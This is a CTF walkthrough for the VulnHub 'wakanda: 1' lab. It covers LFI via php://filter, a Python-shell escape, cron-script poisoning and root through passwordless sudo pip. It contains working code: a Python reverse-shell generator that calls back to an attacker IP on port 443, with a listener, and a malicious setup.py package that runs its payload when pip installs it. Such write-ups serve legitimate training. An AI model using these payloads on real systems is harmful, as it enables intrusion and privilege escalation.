wakanda: 1

[ vulnhub ctf walkthrough ]

Goal

3 flags / root

Download

https://www.vulnhub.com/entry/wakanda-1,251/

Walkthrough

nmap scan of the target.

Detailed nmap service scan: ssh is listening on the non-standard port 3333.

showmount returns nothing (no NFS exports to mount).

dirb turns up fake directories.

There is also a fake secret.txt :)

The default site on port 80.

The page source of the default site contains a hidden link.

The hidden link leads to the French version of the site.

I knew there was an LFI, but it definitely took me some time to find.
I found a great writeup on php://filter for local file inclusion, which worked.

Putting the same request through curl gives an easier base64 string to copy.

Decoding it gives a password :)

There is no username to go with it, but trying the only name found on the website works over ssh.

ssh drops into a Python interpreter instead of a shell; a couple of interpreter commands (importing os or pty and spawning /bin/bash is the usual route) break out to a proper shell.

Flag 1 found.

/etc/passwd shows another user, devops.

As usual, move to /tmp and download the Python Linux privilege-escalation enumeration script. Note the interesting test file in /tmp, owned by devops, with a fairly recent modification time.

Searching the script's output for devops shows a file under /srv that is owned by devops and writable by our user.

Viewing that file: it is the script that wrote the test file in /tmp. The assumption is that it is run on a schedule every few minutes, which makes the writable script a path to running code as devops.

Update the script with a Python reverse shell that connects back to the attacking machine.

After about 5 minutes the nc listener on port 443 gets a connection, as the devops user.
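The reverse-shell step above, as an added example that is not the page's own payload: one function produces the Python one-liner that gets appended to the devops-owned script, and a second plays the part of both the scheduler and the nc listener on localhost so the whole exchange can be run offline. The listener address, port and the bare /bin/sh (no -i) are choices made for the example; the walkthrough's listener was on port 443.

```python
import socket
import subprocess
import sys


def reverse_shell_payload(lhost: str, lport: int, shell: str = "/bin/sh") -> str:
    """The Python one-liner to append to the scheduled, writable script.
    Next time the scheduler runs it, it connects back to lhost:lport and
    hands the socket to a shell as stdin/stdout/stderr, so the shell runs
    with the script owner's privileges. A plain /bin/sh keeps the output
    clean for the demo; on a real engagement add '-i' (or pty.spawn) to
    get a prompt."""
    return (
        "import socket,subprocess;"
        f"s=socket.create_connection(({lhost!r},{lport}));"
        "f=s.fileno();"
        f"subprocess.call([{shell!r}],stdin=f,stdout=f,stderr=f)"
    )


def catch_shell(command: str, timeout: float = 15.0) -> str:
    """Local stand-in for 'nc -lvp 443': listen on an ephemeral localhost
    port, fire the payload out of process the way the cron job would,
    send one command down the connection and return what comes back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(timeout)
    port = srv.getsockname()[1]

    # The scheduler's role: execute the poisoned script in its own process.
    victim = subprocess.Popen(
        [sys.executable, "-c", reverse_shell_payload("127.0.0.1", port)]
    )
    chunks = []
    try:
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(timeout)
            conn.sendall(f"{command}\nexit\n".encode())
            while True:  # read until the shell exits and the socket closes
                data = conn.recv(4096)
                if not data:
                    break
                chunks.append(data)
    finally:
        victim.wait(timeout=timeout)
        srv.close()
    return b"".join(chunks).decode()


if __name__ == "__main__":
    print(reverse_shell_payload("10.10.10.10", 443))
    print(catch_shell("id"))
```

Because the connection is outbound from the victim, it works through the same NAT or filtering that would block an inbound bind shell; that is also why a listener on a port like 443 is a common choice.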

Flag 2 found.

Checking sudo, devops can run pip with no password.

Being familiar with this, I looked up the fakepip code, downloaded it, and updated it.
Another listener was set up on the attacking machine, on port 444.

On the victim machine, download the updated Python fakepip script and execute it via the passwordless sudo pip.

With the listener waiting on the attacking machine, the reverse shell connects and root access is acquired.
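Why sudo pip with no password is a root shell, as an added example (my own illustration, not the fakepip project's code): pip evaluates a package's setup.py as ordinary Python before any install step, so anything at module level runs with pip's privileges, which under sudo are root. The code below writes such a package and evaluates its setup.py in a subprocess the way pip would. The payload here only records the uid it ran as; the walkthrough's fakepip launched a reverse shell in that position instead. Package name, marker file and the setuptools fallback are assumptions made for the example.

```python
import os
import subprocess
import sys
import tempfile
from pathlib import Path

# Every statement at module level of setup.py runs as soon as pip
# evaluates the file, before any install step, with the privileges of
# whoever invoked pip. Under 'sudo pip install .' that is root.
SETUP_TEMPLATE = """\
{payload}
try:
    from setuptools import setup
except ImportError:  # keeps the demo runnable where setuptools is absent
    def setup(**kwargs):
        pass
setup(name="{name}", version="0.0.1")
"""


def build_package(pkg_dir: Path, payload: str, name: str = "fakepip") -> Path:
    """Write a minimal package whose setup.py executes `payload` (Python
    source) first and only then describes itself to pip."""
    pkg_dir.mkdir(parents=True, exist_ok=True)
    setup_py = pkg_dir / "setup.py"
    setup_py.write_text(SETUP_TEMPLATE.format(payload=payload, name=name))
    return setup_py


def run_as_pip_would(setup_py: Path) -> int:
    """Evaluate setup.py in its own process, which is what
    'pip install <dir>' does; here as the current user, on the box as root."""
    return subprocess.call(
        [sys.executable, str(setup_py), "--name"],
        cwd=setup_py.parent,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )


# What the marker should say if the payload ran with our privileges.
EXPECTED_MARKER = f"ran as uid={os.getuid()}"


def demo() -> str:
    """Build the package with a marker-writing payload (the walkthrough's
    fakepip used a reverse shell there instead), run it, return the marker."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = Path(tmp) / "marker"
        payload = (
            "import os\n"
            f"open({str(marker)!r}, 'w').write('ran as uid=%d' % os.getuid())\n"
        )
        setup_py = build_package(Path(tmp) / "fakepip", payload)
        run_as_pip_would(setup_py)
        return marker.read_text() if marker.exists() else "payload did not run"


if __name__ == "__main__":
    print(demo())
```

The fix on the defending side is the obvious one: a sudoers entry granting pip (or any tool that executes code from files the caller controls) is equivalent to granting a root shell, and should be removed rather than constrained.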

Root flag.

Written on November 10, 2018